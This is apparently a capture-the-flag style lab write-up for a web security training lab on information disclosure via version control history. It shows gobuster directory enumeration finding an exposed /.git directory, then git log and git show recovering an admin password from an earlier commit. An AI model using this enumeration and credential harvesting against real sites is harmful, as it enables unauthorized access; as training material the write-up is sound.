This lab discloses sensitive information via its version control history. To solve the lab, obtain the password for the administrator user then log in and delete the user carlos.
Before diving in, let's address the version control history.
Version control is a system that records changes to a file or set of files over time so that you can recall specific versions later. It is commonly used in software development to manage source code, but it can also be applied to other types of files. The purpose of version control is to track changes, collaborate with others, and revert to previous states if necessary.
In this lab, the challenge lies in identifying the version control system data amidst various options such as Git, SVN, Mercurial, and more. Rather than a trial-and-error approach, I opted to use the gobuster tool to systematically explore webapp directories, revealing the presence of a Git repository ("/.git")
â gobuster dir -k -u https://0ae3003d03c8b952812a67ce00e3007c.web-security-academy.net/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://0ae3003d03c8b952812a67ce00e3007c.web-security-academy.net/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.git (Status: 200) [Size: 1201]
In the "out" directory, where I stored the extracted data, the presence of the ".git" directory was confirmed.
â out git:(master) ls -lah
total 20K
drwxr-xr-x 3 ichyaboy ichyaboy 4.0K Feb 7 09:39 .
drwxr-xr-x 4 ichyaboy ichyaboy 4.0K Feb 7 09:38 ..
drwxr-xr-x 7 ichyaboy ichyaboy 4.0K Feb 7 09:39 .git
-rw-r--r-- 1 ichyaboy ichyaboy 37 Feb 7 09:39 admin.conf
-rw-r--r-- 1 ichyaboy ichyaboy 88 Feb 7 09:39 admin_panel.php
I began navigating through the directories and conducting a search for credentials. Typically, configuration files are a common location for such information, yet this particular repository did not yield any credentials in its configuration files. Subsequently, I shifted focus to explore the Git history (or logs) to ascertain whether any changes had occurred in this repository.
â .git git:(master) git log
commit 8ae6f93bff5c54ca6196666e60f11ce4bf88dade (HEAD -> master)
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
commit af30ac04e53492dc04a08d86c74d5eca0bcc4ee9
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date: Mon Jun 22 16:23:42 2020 +0000
Add skeleton admin panel
Ah, now it makes sense. Initially, I was examining the latest commit, which had a description indicating the deletion of the admin password. Realizing the need to investigate further, I decided to delve into the details of the previous commits by utilizing the "git show" command.
â git show af30ac04e53492dc04a08d86c74d5eca0bcc4ee9
commit af30ac04e53492dc04a08d86c74d5eca0bcc4ee9
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date: Mon Jun 22 16:23:42 2020 +0000
Add skeleton admin panel
diff --git a/admin.conf b/admin.conf
new file mode 100644
index 0000000..419335d
--- /dev/null
+++ b/admin.conf
@@ -0,0 +1 @@
+ADMIN_PASSWORD=4g6cn42gioqsj4k76ifv
diff --git a/admin_panel.php b/admin_panel.php
new file mode 100644
index 0000000..8944e3b
--- /dev/null
+++ b/admin_panel.php
@@ -0,0 +1 @@
+<?php echo 'TODO: build an amazing admin panel, but remember to check the password!'; ?>
\ No newline at end of file
The administrator password has been successfully revealed! Now, the next step is to log in as the administrator using the obtained credentials and proceed to delete the user "carlos" to successfully solve the lab.